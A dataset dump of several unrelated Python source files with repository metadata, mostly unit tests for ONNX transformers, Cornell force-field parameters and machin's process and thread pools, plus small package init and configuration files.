e1be8a8dd647ed1453a5cf915cccd6196fcfeff7 | 38 | py | Python | spatial_graphs/__init__.py | alisonpeard/spatial-louvain | 4d2964a769adc0a9169d8c04fa4bcaff1df42afe | [
"BSD-3-Clause"
] | null | null | null | spatial_graphs/__init__.py | alisonpeard/spatial-louvain | 4d2964a769adc0a9169d8c04fa4bcaff1df42afe | [
"BSD-3-Clause"
] | null | null | null | spatial_graphs/__init__.py | alisonpeard/spatial-louvain | 4d2964a769adc0a9169d8c04fa4bcaff1df42afe | [
"BSD-3-Clause"
] | null | null | null | from .spatial_graphs import * # noqa
| 19 | 37 | 0.736842 | 5 | 38 | 5.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184211 | 38 | 1 | 38 | 38 | 0.870968 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bedb1581c5c82b9f555d24d6dfa0c2d242c06300 | 6,090 | py | Python | _unittests/ut_sklapi/test_onnx_speedup_transformer.py | sdpython/mlprodic | 9367dacc91d35ec670c8a8a76708300a75bbc993 | [
"MIT"
] | 32 | 2018-03-04T23:33:30.000Z | 2022-03-10T19:15:06.000Z | _unittests/ut_sklapi/test_onnx_speedup_transformer.py | sdpython/mlprodic | 9367dacc91d35ec670c8a8a76708300a75bbc993 | [
"MIT"
] | 184 | 2017-11-30T14:10:35.000Z | 2022-02-21T08:29:31.000Z | _unittests/ut_sklapi/test_onnx_speedup_transformer.py | sdpython/mlprodic | 9367dacc91d35ec670c8a8a76708300a75bbc993 | [
"MIT"
] | 9 | 2019-07-24T13:18:00.000Z | 2022-03-07T04:08:07.000Z | """
@brief test log(time=4s)
"""
from io import BytesIO
import pickle
import unittest
from logging import getLogger
import numpy
# import pandas
# from sklearn.pipeline import make_pipeline
from sklearn.decomposition import PCA
from sklearn.datasets import load_iris
from pyquickhelper.pycode import ExtTestCase
from mlprodict.sklapi import OnnxSpeedupTransformer
from mlprodict.tools import get_opset_number_from_onnx
from mlprodict.onnx_conv import to_onnx
from mlprodict.onnxrt import OnnxInference
class TestOnnxSpeedupTransformer(ExtTestCase):
def setUp(self):
logger = getLogger('skl2onnx')
logger.disabled = True
def opset(self):
return get_opset_number_from_onnx()
def test_speedup_transform32(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset())
spd.fit(X)
spd.assert_almost_equal(X, decimal=5)
def test_speedup_transform32_onnxruntime(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(
PCA(), target_opset=self.opset(),
runtime="onnxruntime1")
spd.fit(X)
spd.assert_almost_equal(X, decimal=5)
def test_speedup_transform32_numpy(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(
PCA(), target_opset=self.opset(),
runtime="numpy")
spd.fit(X)
spd.assert_almost_equal(X, decimal=5)
def test_speedup_transform32_numba(self):
data = load_iris()
X, _ = data.data, data.target
X = X.astype(numpy.float32)
spd = OnnxSpeedupTransformer(
PCA(), target_opset=self.opset(),
runtime="numba")
spd.fit(X)
spd.assert_almost_equal(X, decimal=5)
self.assertIn("CPUDispatch", str(spd.onnxrt_.func))
def test_speedup_transform64(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X)
spd.assert_almost_equal(X)
def test_speedup_transform64_op_version(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X)
opset = spd.op_version
self.assertGreater(self.opset(), opset[''])
def test_speedup_transform64_pickle(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X)
st = BytesIO()
pickle.dump(spd, st)
st2 = BytesIO(st.getvalue())
spd2 = pickle.load(st2)
expected = spd.transform(X)
got = spd2.transform(X)
self.assertEqualArray(expected, got)
expected = spd.raw_transform(X)
got = spd2.raw_transform(X)
self.assertEqualArray(expected, got)
def test_speedup_transform64_numpy_pickle(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False,
runtime="numpy")
spd.fit(X)
st = BytesIO()
pickle.dump(spd, st)
st2 = BytesIO(st.getvalue())
spd2 = pickle.load(st2)
expected = spd.transform(X)
got = spd2.transform(X)
self.assertEqualArray(expected, got)
expected = spd.raw_transform(X)
got = spd2.raw_transform(X)
self.assertEqualArray(expected, got)
def test_speedup_transform64_numba_pickle(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False,
runtime="numba")
spd.fit(X)
st = BytesIO()
pickle.dump(spd, st)
st2 = BytesIO(st.getvalue())
spd2 = pickle.load(st2)
expected = spd.transform(X)
got = spd2.transform(X)
self.assertEqualArray(expected, got)
expected = spd.raw_transform(X)
got = spd2.raw_transform(X)
self.assertEqualArray(expected, got)
def test_speedup_transform64_onnx(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False)
spd.fit(X)
expected = spd.transform(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})['variable']
self.assertEqualArray(expected, got)
def test_speedup_transform64_onnx_numpy(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False,
runtime='numpy')
spd.fit(X)
expected = spd.transform(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})['variable']
self.assertEqualArray(expected, got)
def test_speedup_transform64_onnx_numba(self):
data = load_iris()
X, _ = data.data, data.target
spd = OnnxSpeedupTransformer(PCA(), target_opset=self.opset(),
enforce_float32=False,
runtime='numba')
spd.fit(X)
expected = spd.transform(X)
onx = to_onnx(spd, X[:1])
oinf = OnnxInference(onx)
got = oinf.run({'X': X})['variable']
self.assertEqualArray(expected, got)
if __name__ == '__main__':
unittest.main()
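The pickle round-trip checks above all follow the same pattern: fit, serialize to an in-memory buffer, deserialize, and compare outputs. A minimal standalone sketch of that pattern — using a toy hand-rolled transformer rather than `OnnxSpeedupTransformer`, so it has no mlprodict dependency — looks like:

```python
from io import BytesIO
import pickle

import numpy


class MeanCenterer:
    """Toy stand-in for a fitted transformer (hypothetical, for illustration)."""

    def fit(self, X):
        self.mean_ = X.mean(axis=0)
        return self

    def transform(self, X):
        return X - self.mean_


X = numpy.arange(12, dtype=float).reshape(4, 3)
spd = MeanCenterer().fit(X)

# Serialize to an in-memory buffer and restore, as the tests above do.
buf = BytesIO()
pickle.dump(spd, buf)
spd2 = pickle.loads(buf.getvalue())

# The restored copy must produce identical outputs.
assert numpy.allclose(spd.transform(X), spd2.transform(X))
```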
| 33.461538 | 70 | 0.587849 | 667 | 6,090 | 5.181409 | 0.14093 | 0.055556 | 0.048611 | 0.055556 | 0.774016 | 0.758391 | 0.758391 | 0.758391 | 0.7364 | 0.735243 | 0 | 0.015858 | 0.30624 | 6,090 | 181 | 71 | 33.646409 | 0.80213 | 0.014286 | 0 | 0.730263 | 0 | 0 | 0.016016 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.092105 | false | 0 | 0.078947 | 0.006579 | 0.184211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bee409ec09959aac70ccb8237e56fe1667419eb1 | 263 | py | Python | datasets/loader/__init__.py | wutong16/Adversarial_Long-Tail | ab2f3a792aede2bd2a3e57657c787ec542165be1 | [
"FSFAP"
] | 78 | 2021-04-05T15:58:03.000Z | 2022-03-30T02:42:42.000Z | datasets/loader/__init__.py | wutong16/Adversarial_Long-Tail | ab2f3a792aede2bd2a3e57657c787ec542165be1 | [
"FSFAP"
] | 1 | 2022-03-08T04:11:02.000Z | 2022-03-18T04:11:17.000Z | datasets/loader/__init__.py | wutong16/Adversarial_Long-Tail | ab2f3a792aede2bd2a3e57657c787ec542165be1 | [
"FSFAP"
] | 9 | 2021-04-13T09:51:51.000Z | 2022-03-09T02:45:20.000Z | from .sampler import GroupSampler, DistributedGroupSampler, DistributedSampler, ClassAwareSampler
from .build_loader import build_dataloader
__all__ = ['GroupSampler', 'DistributedGroupSampler', 'build_dataloader', 'DistributedSampler', 'ClassAwareSampler']
| 52.6 | 117 | 0.828897 | 20 | 263 | 10.55 | 0.55 | 0.331754 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087452 | 263 | 4 | 118 | 65.75 | 0.879167 | 0 | 0 | 0 | 0 | 0 | 0.332046 | 0.088803 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
bef073ec8748277f5988dd656aed1e4012dd8587 | 252 | py | Python | nmigen_boards/colorlight_i5.py | hansfbaier/amaranth-boards | a3e92db69e74cc18a42808f6f72068f05efe018e | [
"BSD-2-Clause"
] | 1 | 2022-01-22T20:23:07.000Z | 2022-01-22T20:23:07.000Z | nmigen_boards/colorlight_i5.py | amaranth-community-unofficial/amaranth-boards | eacb18700d0ed97f525737ca80d923ebd5851505 | [
"BSD-2-Clause"
] | null | null | null | nmigen_boards/colorlight_i5.py | amaranth-community-unofficial/amaranth-boards | eacb18700d0ed97f525737ca80d923ebd5851505 | [
"BSD-2-Clause"
] | null | null | null |
from amaranth_boards.colorlight_i5 import *
from amaranth_boards.colorlight_i5 import __all__
import warnings
warnings.warn("instead of nmigen_boards.colorlight_i5, use amaranth_boards.colorlight_i5",
DeprecationWarning, stacklevel=2)
| 28 | 90 | 0.809524 | 31 | 252 | 6.193548 | 0.516129 | 0.333333 | 0.375 | 0.40625 | 0.375 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0.022936 | 0.134921 | 252 | 8 | 91 | 31.5 | 0.857798 | 0 | 0 | 0 | 0 | 0 | 0.290837 | 0.227092 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
8360b50f91e82a0d5fee0a38f6990a31553fc32f | 72 | py | Python | py_tdlib/constructors/chat_members_filter_banned.py | Mr-TelegramBot/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 24 | 2018-10-05T13:04:30.000Z | 2020-05-12T08:45:34.000Z | py_tdlib/constructors/chat_members_filter_banned.py | MrMahdi313/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 3 | 2019-06-26T07:20:20.000Z | 2021-05-24T13:06:56.000Z | py_tdlib/constructors/chat_members_filter_banned.py | MrMahdi313/python-tdlib | 2e2d21a742ebcd439971a32357f2d0abd0ce61eb | [
"MIT"
] | 5 | 2018-10-05T14:29:28.000Z | 2020-08-11T15:04:10.000Z | from ..factory import Type
class chatMembersFilterBanned(Type):
pass
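Classes like this carry no data or behavior of their own; they exist purely as type markers that downstream code can dispatch on. A self-contained sketch of that pattern (the `Type` base and the second filter class here are stand-ins, not the library's real definitions):

```python
class Type:
    """Minimal stand-in for the library's base class (assumption)."""
    pass


class chatMembersFilterBanned(Type):
    pass


class chatMembersFilterAdministrators(Type):
    pass


def describe(f):
    # Dispatch on the marker type alone; the instances carry no fields.
    if isinstance(f, chatMembersFilterBanned):
        return "banned members"
    return "other filter"


assert describe(chatMembersFilterBanned()) == "banned members"
assert describe(chatMembersFilterAdministrators()) == "other filter"
```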
| 12 | 36 | 0.791667 | 8 | 72 | 7.125 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138889 | 72 | 5 | 37 | 14.4 | 0.919355 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
8362dfe4ca13727fd2af4c0f69bc5560e5277526 | 231 | py | Python | board/imx6sl/ucube.py | jinlongliu/AliOS-Things | ce051172a775f987183e7aca88bb6f3b809ea7b0 | [
"Apache-2.0"
] | 4 | 2019-03-12T11:04:48.000Z | 2019-10-22T06:06:53.000Z | board/imx6sl/ucube.py | IamBaoMouMou/AliOS-Things | 195a9160b871b3d78de6f8cf6c2ab09a71977527 | [
"Apache-2.0"
] | 3 | 2018-12-17T13:06:46.000Z | 2018-12-28T01:40:59.000Z | board/imx6sl/ucube.py | IamBaoMouMou/AliOS-Things | 195a9160b871b3d78de6f8cf6c2ab09a71977527 | [
"Apache-2.0"
] | 2 | 2018-01-23T07:54:08.000Z | 2018-01-23T11:38:59.000Z | linux_only_targets="blink bluetooth.ble_bqb netmgrapp bluetooth.blemesh_srv bluetooth.blemesh uDataapp bluetooth.blemesh_cli bluetooth.bleadv wifihalapp hdlcapp.hdlcserver acapp helloworld bluetooth.bleperipheral helloworld_nocli"
| 115.5 | 230 | 0.896104 | 28 | 231 | 7.178571 | 0.714286 | 0.238806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 231 | 1 | 231 | 231 | 0.926267 | 0 | 0 | 0 | 0 | 1 | 0.904762 | 0.281385 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
55c4f4dd136a61fc9c07b3ae15653490c12f66f5 | 1,836 | py | Python | docking/test_Cornell.py | thenlevy/docking_project | 8f0acfa44d57d466e119872cb0f099de7dc85423 | [
"MIT"
] | 1 | 2018-04-09T12:15:41.000Z | 2018-04-09T12:15:41.000Z | docking/test_Cornell.py | thenlevy/docking_project | 8f0acfa44d57d466e119872cb0f099de7dc85423 | [
"MIT"
] | null | null | null | docking/test_Cornell.py | thenlevy/docking_project | 8f0acfa44d57d466e119872cb0f099de7dc85423 | [
"MIT"
] | null | null | null | from Cornell import Cornell_calc
from parser_pdb import parse_pdb
from structureToolsProjPython import preparePDB
official = preparePDB("../data/ex.pdb", "D")
test = Cornell_calc(parse_pdb("../data/ex.pdb"))
for chain in official["chains"]:
for curres in official[chain]["reslist"]:
for atomtype in official[chain][curres]["atomlist"]:
atom = official[chain][curres][atomtype]
id_at = int(atom['id']) - 1
if atom["charge"] != test.get_q(id_at):
print (curres, official[chain][curres]["resname"], atomtype, "charge")
print(id_at)
if atom["vdw"] != test.get_r(id_at):
print (curres, official[chain][curres]["resname"], atomtype, "vdw")
print(id_at)
if atom["epsilon"] != test.get_epsilon(id_at):
print (curres, official[chain][curres]["resname"], atomtype, "epsilon")
print(id_at)
official = None
official = preparePDB("../data/Lig_natif.pdb", "D")
test = Cornell_calc(parse_pdb("../data/Lig_natif.pdb"))
id_at = 0
for chain in official["chains"]:
for curres in official[chain]["reslist"]:
for atomtype in official[chain][curres]["atomlist"]:
atom = official[chain][curres][atomtype]
if atom["charge"] != test.get_q(id_at):
print (curres, official[chain][curres]["resname"], atomtype, "charge")
print(id_at)
if atom["vdw"] != test.get_r(id_at):
print (curres, official[chain][curres]["resname"], atomtype, "vdw")
print(id_at)
if atom["epsilon"] != test.get_epsilon(id_at):
print (curres, official[chain][curres]["resname"], atomtype, "epsilon")
print(id_at)
assert(False)
id_at += 1
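The nested comparison loops above are duplicated verbatim for both PDB files. A hedged sketch of the same check factored into a reusable function over plain dictionaries (no dependency on `parser_pdb` or `Cornell`; the parameter values are made up for illustration):

```python
def find_mismatches(reference, computed, keys=("charge", "vdw", "epsilon")):
    """Compare per-atom parameters between a reference table and a
    computed table; return the (atom_id, key) pairs that disagree."""
    mismatches = []
    for atom_id, params in reference.items():
        for key in keys:
            if params[key] != computed[atom_id][key]:
                mismatches.append((atom_id, key))
    return mismatches


reference = {0: {"charge": -0.3, "vdw": 1.7, "epsilon": 0.086}}
computed = {0: {"charge": -0.3, "vdw": 1.9, "epsilon": 0.086}}

assert find_mismatches(reference, computed) == [(0, "vdw")]
```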
| 43.714286 | 87 | 0.581699 | 221 | 1,836 | 4.696833 | 0.190045 | 0.057803 | 0.183044 | 0.086705 | 0.791908 | 0.791908 | 0.791908 | 0.791908 | 0.732177 | 0.732177 | 0 | 0.002222 | 0.264706 | 1,836 | 41 | 88 | 44.780488 | 0.766667 | 0 | 0 | 0.684211 | 0 | 0 | 0.120915 | 0.022876 | 0 | 0 | 0 | 0 | 0.026316 | 1 | 0 | false | 0 | 0.078947 | 0 | 0.078947 | 0.315789 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
55db9b1436b009d05084d9b0d0c06ad3f6981146 | 13,193 | py | Python | test/parallel/test_pool.py | lorenzosteccanella/machin | 9d3ce87dbed820b5019211b0690b54613084d9e4 | [
"MIT"
] | 287 | 2020-06-13T05:19:50.000Z | 2022-03-31T04:46:32.000Z | test/parallel/test_pool.py | lorenzosteccanella/machin | 9d3ce87dbed820b5019211b0690b54613084d9e4 | [
"MIT"
] | 19 | 2020-08-19T05:33:45.000Z | 2022-03-27T15:16:03.000Z | test/parallel/test_pool.py | lorenzosteccanella/machin | 9d3ce87dbed820b5019211b0690b54613084d9e4 | [
"MIT"
] | 44 | 2020-07-06T00:41:44.000Z | 2022-03-29T17:05:08.000Z | from logging import DEBUG
from machin.parallel.pool import Pool, P2PPool, CtxPool, ThreadPool, CtxThreadPool
from machin.utils.logging import default_logger as logger
from test.util_fixtures import *
from test.util_platforms import linux_only
import dill
import pytest
import torch as t
# enable pool logging
logger.setLevel(DEBUG)
def init_func(*_):
print("Hello")
def func(x):
return t.sum(x * 2)
def func2(x, y):
return t.sum(x + y)
class TestPool:
pool_impl = Pool
def test_apply(self):
pool = self.pool_impl(processes=2)
x = t.ones([10])
assert pool.apply(func, (x,)) == 20
# for pytest-cov to run on sub processes
pool.close()
pool.join()
def test_apply_async(self):
pool = self.pool_impl(processes=2)
x = t.ones([10])
assert pool.apply_async(func, (x,)).get() == 20
pool.close()
pool.join()
def test_map(self):
pool = self.pool_impl(processes=2)
x = [t.ones([10]) * i for i in range(5)]
assert all(
out == expect_out
for out, expect_out in zip(pool.map(func, x), [0, 20, 40, 60, 80])
)
pool.close()
pool.join()
def test_map_async(self):
pool = self.pool_impl(processes=2)
x = [t.ones([10]) * i for i in range(5)]
assert all(
out == expect_out
for out, expect_out in zip(
pool.map_async(func, x).get(), [0, 20, 40, 60, 80]
)
)
pool.close()
pool.join()
def test_imap(self):
pool = self.pool_impl(processes=2)
x = [t.ones([10]) * i for i in range(5)]
assert all(
out == expect_out
for out, expect_out in zip(pool.imap(func, x), [0, 20, 40, 60, 80])
)
pool.close()
pool.join()
def test_imap_unordered(self):
pool = self.pool_impl(processes=2)
x = [t.ones([10]) * i for i in range(5)]
assert all(
out == expect_out
for out, expect_out in zip(
sorted(pool.imap_unordered(func, x)), [0, 20, 40, 60, 80]
)
)
pool.close()
pool.join()
def test_starmap(self):
pool = self.pool_impl(processes=2)
x = [(t.ones([10]) * i, t.ones([10]) * i) for i in range(5)]
assert all(
out == expect_out
for out, expect_out in zip(pool.starmap(func2, x), [0, 20, 40, 60, 80])
)
pool.close()
pool.join()
def test_starmap_async(self):
pool = self.pool_impl(processes=2)
x = [(t.ones([10]) * i, t.ones([10]) * i) for i in range(5)]
assert all(
out == expect_out
for out, expect_out in zip(
pool.starmap_async(func2, x).get(), [0, 20, 40, 60, 80]
)
)
pool.close()
pool.join()
# Disabled for now
# Individual testing passes while testing with all other module fails with:
# Traceback (most recent call last):
# File "/opt/conda/lib/python3.7/multiprocessing/process.py", line 297,
# in _bootstrap
# self.run()
# File "/opt/conda/lib/python3.7/multiprocessing/process.py", line 99, in run
# self._target(*self._args, **self._kwargs)
# File "/opt/conda/lib/python3.7/site-packages/torch/multiprocessing/pool.py",
# line 9, in clean_worker
# multiprocessing.pool.worker(*args, **kwargs)
# File "/opt/conda/lib/python3.7/multiprocessing/pool.py", line 110, in worker
# task = get()
# File "/var/lib/jenkins/workspace/machin_master_2/machin/parallel/queue.py",
# line 112, in get
# return loads(res)
# File "/opt/conda/lib/python3.7/site-packages/dill/_dill.py", line 283, in loads
# return load(file, ignore, **kwds)
# File "/opt/conda/lib/python3.7/site-packages/dill/_dill.py", line 278, in load
# return Unpickler(file, ignore=ignore, **kwds).load()
# File "/opt/conda/lib/python3.7/site-packages/dill/_dill.py", line 481, in load
# obj = StockUnpickler.load(self)
# File "/opt/conda/lib/python3.7/site-packages/torch/multiprocessing
# /reductions.py", line 117, in rebuild_cuda_tensor
# event_sync_required)
# RuntimeError: CUDA error: peer access is not supported between these two devices
# def test_gpu_tensor(self, gpu):
# x = [
# t.ones([10], device=gpu) * i
# for i in range(5)
# ]
# logger.info("GPU tensors created.")
# pool = self.pool_impl(processes=2, is_copy_tensor=True)
# logger.info("Pool 1 created.")
# assert all(
# out == expect_out
# for out, expect_out in zip(pool.map(func, x), [0, 20, 40, 60, 80])
# )
# pool.close()
# pool.join()
# logger.info("Pool 1 joined.")
#
# pool = self.pool_impl(processes=2, is_copy_tensor=False, share_method="cuda")
# logger.info("Pool 2 created.")
# assert all(
# out == expect_out
# for out, expect_out in zip(pool.map(func, x), [0, 20, 40, 60, 80])
# )
# pool.close()
# pool.join()
# logger.info("Pool 2 joined.")
@linux_only
def test_cpu_shared_tensor(self):
x = [t.ones([10]) * i for i in range(5)]
for xx in x:
xx.share_memory_()
logger.info("CPU tensors created.")
pool = self.pool_impl(processes=2, is_copy_tensor=False, share_method="cpu")
logger.info("Pool created.")
assert all(
out == expect_out
for out, expect_out in zip(pool.map(func, x), [0, 20, 40, 60, 80])
)
pool.close()
pool.join()
logger.info("Pool joined.")
def test_lambda_and_local(self):
x = [t.ones([10]) * i for i in range(5)]
y = t.ones([10])
x2 = [(t.ones([10]) * i, t.ones([10]) * i) for i in range(5)]
def local_func(xx):
nonlocal y
return t.sum(xx + y)
pool = self.pool_impl(processes=2, is_recursive=True)
assert all(
out == expect_out
for out, expect_out in zip(pool.map(local_func, x), [10, 20, 30, 40, 50])
)
assert all(
out == expect_out
for out, expect_out in zip(
pool.map(lambda xx: t.sum(xx[0] + xx[1]), x2), [0, 20, 40, 60, 80]
)
)
pool.close()
pool.join()
pool = self.pool_impl(processes=2)
assert all(
out == expect_out
for out, expect_out in zip(pool.map(func, x), [0, 20, 40, 60, 80])
)
pool.close()
pool.join()
def test_size(self):
pool = self.pool_impl(processes=2)
assert pool.size() == 2
pool.close()
pool.join()
def test_reduce(self):
with pytest.raises(NotImplementedError, match="cannot be passed"):
dill.dumps(Pool(processes=2))
class TestP2PPool(TestPool):
pool_impl = P2PPool
def ctx_func(ctx, x):
# pretend to have done something using x with context ctx
return ctx, x
def ctx_func2(ctx, x, y):
# pretend to have done something using x and y with context ctx
return ctx, x + y
class TestCtxPool:
def test_init(self):
with pytest.raises(ValueError, match="not equal to the number"):
_ = CtxPool(processes=2, worker_contexts=[0, 1, 2, 3])
pool = CtxPool(processes=2, initializer=init_func, initargs=("some_args",))
pool.close()
pool.join()
pool = CtxPool(processes=2, worker_contexts=[0, 1])
pool.close()
pool.join()
def test_ctx_map(self):
pool = CtxPool(processes=2, worker_contexts=[0, 1])
# make sure both workers will have items
x = [i for i in range(10)]
result = pool.map(ctx_func, x)
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_ctx_starmap(self):
pool = CtxPool(processes=2, worker_contexts=[0, 1])
# make sure both workers will have items
xy = [(i, i) for i in range(10)]
result = pool.starmap(ctx_func2, xy)
assert sorted([r[1] for r in result]) == [i * 2 for i in range(10)]
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_multiple_ctx_map(self):
# test whether two context pools will interfere with each other
pool = CtxPool(processes=2, worker_contexts=[0, 1])
pool2 = CtxPool(processes=2, worker_contexts=[2, 3])
# create enough work items so that the execution period of two pools
# will overlap
x = [i for i in range(50000)]
result = pool.map(ctx_func, x)
result2 = pool2.map(ctx_func, x)
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
assert sorted([r[1] for r in result2]) == x
assert {r[0] for r in result2}.issubset({2, 3})
pool.close()
pool.join()
pool2.close()
pool2.join()
class TestThreadPool:
def test_size(self):
pool = ThreadPool(processes=2)
assert pool.size() == 2
pool.close()
pool.join()
def test_reduce(self):
with pytest.raises(NotImplementedError, match="cannot be passed"):
dill.dumps(ThreadPool(processes=2))
class TestCtxThreadPool:
def test_init(self):
with pytest.raises(ValueError, match="not equal to the number"):
_ = CtxThreadPool(processes=2, worker_contexts=[0, 1, 2, 3])
pool = CtxThreadPool(
processes=2, initializer=init_func, initargs=("some_args",)
)
pool.close()
pool.join()
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
pool.close()
pool.join()
def test_apply(self):
pool = CtxThreadPool(processes=2)
assert pool.apply(ctx_func, (1,))[1] == 1
# for pytest-cov to run on sub processes
pool.close()
pool.join()
def test_apply_async(self):
pool = CtxThreadPool(processes=2)
assert pool.apply_async(ctx_func, (1,)).get()[1] == 1
pool.close()
pool.join()
def test_map(self):
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
x = [i for i in range(10)]
result = pool.map(ctx_func, x)
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_map_async(self):
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
x = [i for i in range(10)]
result = pool.map_async(ctx_func, x).get()
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_imap(self):
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
x = [i for i in range(10)]
result = pool.imap(ctx_func, x)
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_imap_unordered(self):
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
x = [i for i in range(10)]
result = pool.imap_unordered(ctx_func, x)
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_starmap(self):
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
xy = [(i, i) for i in range(10)]
result = pool.starmap(ctx_func2, xy)
assert sorted([r[1] for r in result]) == [i * 2 for i in range(10)]
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_starmap_async(self):
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
xy = [(i, i) for i in range(10)]
result = pool.starmap_async(ctx_func2, xy).get()
assert sorted([r[1] for r in result]) == [i * 2 for i in range(10)]
assert {r[0] for r in result}.issubset({0, 1})
pool.close()
pool.join()
def test_multiple_ctx_map(self):
# test whether two context thread pools will interfere with each other
pool = CtxThreadPool(processes=2, worker_contexts=[0, 1])
pool2 = CtxThreadPool(processes=2, worker_contexts=[2, 3])
# create enough work items so that the execution period of two pools
# will overlap
x = [i for i in range(50000)]
result = pool.map(ctx_func, x)
result2 = pool2.map(ctx_func, x)
assert sorted([r[1] for r in result]) == x
assert {r[0] for r in result}.issubset({0, 1})
assert sorted([r[1] for r in result2]) == x
assert {r[0] for r in result2}.issubset({2, 3})
pool.close()
pool.join()
pool2.close()
pool2.join()
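The pool lifecycle exercised throughout these tests — construct, `map`, `close`, `join` — can be sketched with the standard library's thread-backed pool alone, without machin's wrappers:

```python
from multiprocessing.pool import ThreadPool


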